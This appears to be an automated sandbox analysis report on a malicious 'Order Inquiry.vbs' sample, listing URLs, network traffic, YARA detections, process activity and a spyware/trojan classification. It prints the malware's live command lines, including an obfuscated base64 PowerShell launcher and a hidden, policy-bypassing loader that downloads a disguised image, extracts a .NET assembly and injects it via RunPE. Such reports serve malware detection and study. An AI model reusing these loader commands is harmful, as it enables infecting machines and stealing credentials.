          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.drString found in binary or memory: https://www.office.com/
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/LR
          Source: tmpE8C2.tmp.dat.9.drString found in binary or memory: https://www.office.com/Office
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/technetwork/java/javase/downloads
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54306
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 54306 -> 443
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:54306 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow created: window name: CLIPBRDWNDCLASS

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Very long command line found
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8786
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8786
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691184
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0169125D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01693970
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691441
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016934E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_016934D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01691F4E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06425208
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064293D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064243D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_064293A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06423E88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F1340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F1331
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066F5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06705F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06707F1E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06708E20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06708A48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F2E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F2EC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683BBF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683CB61
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0683BBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_068CEA40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FC128
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FC116
          Source: Order Inquiry.vbsInitial sample: Strings found which are bigger than 50
          Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3dasY[1].txtJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\878411
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5ze3qi.xk1.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: AddInProcess32.exe, 00000009.00000002.1738432443.0000000006191000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, tmp3198.tmp.dat.9.dr, tmpA565.tmp.dat.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
